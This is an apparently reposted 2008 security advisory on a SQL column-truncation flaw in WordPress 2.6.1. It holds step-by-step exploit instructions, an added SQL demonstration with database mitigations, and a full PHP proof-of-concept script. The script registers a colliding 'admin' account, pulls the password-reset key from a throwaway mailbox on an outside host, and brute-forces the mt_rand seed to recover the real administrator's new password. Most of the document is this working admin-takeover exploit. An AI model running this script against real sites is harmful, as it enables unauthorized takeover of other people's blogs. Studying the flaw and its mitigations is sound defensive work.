
WordPress SQL Column Truncation Vulnerability

October 13, 2008

The WordPress vulnerability published today works as follows:

Register a user named admin followed by 55 spaces and an x (61 characters in total). The user_login column of wp_users is VARCHAR(60), so MySQL silently truncates the name to admin plus trailing spaces, and its space-padded string comparison then treats that row as equal to admin. With such a user registered, the password-recovery function can be used to reset the original administrator's password; the proof-of-concept script later in this post goes further and predicts the new password.

Vulnerable Systems:
* WordPress version 2.6.1

Exploit:
1. Go to URL: server.com/wp-login.php?action=register
2. Register as:
login: admin x (the user admin[55 space chars]x)
email: your email

Now we have a duplicate 'admin' account in the database

3. Go to URL: server.com/wp-login.php?action=lostpassword
4. Write your email into the field and submit the form
5. Check your email and follow the reset confirmation link
6. The admin's password is changed, but the new password is sent to the real admin's email
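An added SQL example, not from the post or from irk4z's advisory, that replays the collision on a reduced copy of wp_users. The table, rows and e-mail addresses are constructed for the demo; it assumes MySQL 5.x or MariaDB with a PAD SPACE collation and a non-strict sql_mode, which were the MySQL 5.0/5.1 defaults that WordPress installs of the time usually ran on:

```sql
-- Added example (not the post's or the advisory's code): replays the
-- column-truncation collision on a reduced, constructed copy of wp_users.
-- Assumes MySQL 5.x / MariaDB, a PAD SPACE collation such as
-- utf8_general_ci, and a non-strict sql_mode (the MySQL 5.0/5.1 defaults).
SET SESSION sql_mode = '';

CREATE TEMPORARY TABLE users_demo (
  ID                  INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  user_login          VARCHAR(60)  NOT NULL,   -- same width as wp_users.user_login
  user_email          VARCHAR(100) NOT NULL,
  user_activation_key VARCHAR(60)  NOT NULL DEFAULT ''
) CHARACTER SET utf8 COLLATE utf8_general_ci;

-- constructed data: the legitimate administrator
INSERT INTO users_demo (user_login, user_email)
VALUES ('admin', 'real-admin@example.com');

-- 1. The attacker's login: 'admin' + 55 spaces + 'x', 61 characters.
SET @login = CONCAT('admin', REPEAT(' ', 55), 'x');
SELECT CHAR_LENGTH(@login) AS login_length;

-- 2. The registration code's "is this username taken?" lookup. The padded
--    comparison pads 'admin' with spaces, so the trailing 'x' still
--    differs and no row matches: registration is allowed to continue.
SELECT COUNT(*) AS already_taken FROM users_demo WHERE user_login = @login;

-- 3. The INSERT truncates the value to 60 characters: 'admin' followed by
--    55 spaces. Non-strict mode only raises warning 1265 (Data truncated).
INSERT INTO users_demo (user_login, user_email)
VALUES (@login, 'attacker@example.com');
SHOW WARNINGS;

-- 4. Trailing spaces are ignored by PAD SPACE collations, so a lookup by
--    user_login = 'admin' (the kind the reset flow performs) now returns
--    both accounts; the brackets make the stored padding visible.
SELECT ID, CONCAT('[', user_login, ']') AS stored_login, user_email
FROM users_demo
WHERE user_login = 'admin';

-- 5a. Mitigation at the database: strict mode turns the truncation into
--     error 1406 (Data too long), so the colliding row is never created.
SET SESSION sql_mode = 'STRICT_ALL_TABLES';
INSERT INTO users_demo (user_login, user_email)
VALUES (@login, 'attacker2@example.com');

-- 5b. Mitigation at the query: a byte-wise comparison does not pad, so
--     only the genuine row matches. The real fix is to trim and
--     length-check the login in application code before it reaches SQL.
SELECT ID, user_email FROM users_demo WHERE user_login = BINARY 'admin';
```

Step 2 returns 0, step 4 returns both rows (ID 1 as [admin] and ID 2 as admin with 55 trailing spaces inside the brackets), step 5a fails with ERROR 1406 (run the file with `mysql --force` so the client continues past it), and 5b returns only ID 1. On MySQL 8.0 the default utf8mb4_0900_ai_ci collation is NO PAD and the default sql_mode is strict, so the collision only reproduces with the explicit collation and sql_mode set above.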

Additional Information:
The information has been provided by irk4z.
The original article can be found at: http://irk4z.wordpress.com/

The proof-of-concept script reproduced below (by iso^kpsbr, for WordPress 2.6.1) automates the attack and goes one step further: it registers the colliding user, triggers the reset, pulls the reset key from a throwaway mailbox, and brute-forces the mt_rand() seed that produced the key in order to predict the new password that WordPress mailed to the real admin.

#!/usr/bin/php
<?php
# ------------------------------------------------------------
# quick'n'dirty wordpress admin-take0ver poc
# by iso^kpsbr in august 2oo8
#
# works w/ wordpress 2.6.1
#
# .oO( private -- do not spread! )Oo.
#
# you'll have to make sure you run roughly the same
# php version as on the server, that is: if server
# is >=5.2.1 you'll need to be as well, in case
# server is <5.2.1, your php also needs to be below.
# to make sure it works you'll need the exact same version!
# also, mod_php works better than (f)cgi..
# (this is a first working version - not a very reliable one)

#
# you should create rainbow tables to make this work in a
# real world scenario:
# php-5.2.0/php createtables.php > wp261_php520
# php-5.2.1/php createtables.php > wp261_php521
#
#-------------------------------------------------------------

# target blog URL from the command line (CLI only)
$BLOG = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';

echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n";

if(!$BLOG) {
echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n";
echo " fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n";
exit(1);
}

$UA = "WordpressAdminTakeover";
# throwaway mailbox on nospamfor.us; the reset mail is fetched from it below
$MBOX="wp".trim(`ps|md5sum|head -c 8`);
$EMAIL="$MBOX@nospamfor.us";

echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ?
"[X] rainbow tables available\n" :
"[!] rainbow tables not found - this will be really slow\n";

set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",20);

if(!preg_match('!http://([^/]+)(.*)$!', $BLOG, $match)) {
die("[!] $BLOG is no valid URL\n");
}

$HOST = $match[1];
# '' for a blog at the document root, '/blog' otherwise (no trailing slash,
# the requests below append /wp-login.php themselves)
$PATH = rtrim($match[2], '/');

echo "[-] registering new admin user\n";
# user_login is VARCHAR(60): 'admin' + 60 spaces + 'x' passes the
# "username already exists" check (the trailing x differs from 'admin')
# but is silently truncated on INSERT to 'admin' + 55 spaces, which a
# PAD SPACE collation treats as equal to 'admin'.
$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
$data = "user_login=admin".str_repeat("%20",60)."x&user_email=".urlencode($EMAIL);
$req = "POST $PATH/wp-login.php?action=register HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data;
fputs($suck, $req);
sleep(1);
fclose($suck);

echo "[-] requesting resetlink and mail to '$EMAIL'\n";
# lostpassword goes over a keep-alive socket and the rp request below
# reuses it, so that both are served by the same server process (see
# the header note about mod_php working better than (f)cgi).
$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
$data="user_login=".urlencode($EMAIL)."&wp-submit=Get+New+Password";
$req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1\r\nHost: $HOST\r\nReferer: $BLOG/wp-login.php?action=lostpassword\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data;
fputs($suck, $req);

echo "[.] giving $BLOG some time to deliver mail..\n";
# idle GETs keep the connection open while the reset mail is delivered
for($i=0;$i<8;$i++) {
fputs($suck,"GET / HTTP/1.1\r\nHost: $HOST\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\n\r\n");
sleep(2);
}

echo "[-] fetching resetlink token $MBOX\n";
$PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us");
if(!preg_match('/.+mailid=(\d+).+?Reset/s', $PAGE, $match)) die("[!] failed to find resetmail try raising the wait-time right above\n");
$MAILID=$match[1];

echo "[-] fetching resetmail $MAILID\n";

# the mail body carries .../wp-login.php?action=rp&key=<20 alphanumeric chars>
$WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX");
if(!preg_match('/key=([A-Za-z0-9]+)/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAIL\n");
$KEY=$match[1];

echo "[X] found resetkey $KEY\n";
echo "[-] resetting password\n";

# following the rp link makes WordPress generate the new password with
# wp_generate_password() and mail it to the real admin; the request only
# has to happen, the password itself is recomputed locally below
$req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\n\r\n";
fputs($suck, $req);
while(!feof($suck)) {
fgets($suck);   # drain the response, we do not need it
}
fclose($suck);

echo "[-] calculating password\n";
$SEED=false;
if(file_exists('wp261_php520') || file_exists('wp261_php521')) {
# tables are assumed to hold one "seed:key" line per seed (what the cut
# below expects); -h keeps grep from prefixing the file name to the match
$SEED=trim(`grep -hF $KEY wp261*|cut -d : -f 1`);
if($SEED==='') $SEED=false;
else echo "[X] got seed $SEED from rainbow table\n";
}
$PASSWORD=calcpass($KEY, $SEED);

echo "[X] all done.";
exit;

function calcpass($resetkey, $seed = false) {
# Detect whether this PHP ignores the lowest seed bit (mt_srand(2) and
# mt_srand(3) giving the same first value, the case the header calls
# < 5.2.1). If so only odd seeds need testing: 2^31 instead of 2^32.
mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand();
define('BUGGY', $a == $b);
echo "[-] wpress password computation. running in ".(BUGGY?'fast':'slow')." mode\n";

echo "[+] got key $resetkey via mail\n";

if($seed===false) $seed = getseed($resetkey);

if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)\n");

# the reset key and the new password are assumed to be consecutive draws
# from the same seeded mt_rand() stream: replay the 20-char key first,
# then the next 12 characters are the password WordPress mailed out
mt_srand((int)$seed);
echo "[-] seed for key ".wp_generate_password(20,false)." is $seed\n";
$pass = wp_generate_password();
echo "[+] new credentials are admin:$pass\n";
return $pass;
}

function wp_generate_password($length = 12, $special_chars = true) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
if ( $special_chars )
$chars .= '!@#$%^&*()';

$password = '';
for ( $i = 0; $i < $length; $i++ )
$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
return $password;
}

function getseed($resetkey) {
# brute force: for every candidate seed regenerate the 20-char key and
# compare it with the one received by mail. 2^32 (or 2^31) candidates,
# hence the rainbow tables suggested in the header.
echo "[-] calculating rand seed for $resetkey (this will take a looong time)";
$max = BUGGY ? pow(2,31) : pow(2,32) - 1;
for($x=0;$x<=$max;$x++) {
$seed = BUGGY ? ($x << 1) + 1 : $x;   # low bit ignored: odd seeds only
mt_srand($seed);
$testkey = wp_generate_password(20,false);
if($testkey===$resetkey) { echo "o\n"; return $seed; }

if(!($x % 10000)) echo ".";
}
echo "\n";
return false;
}

?>
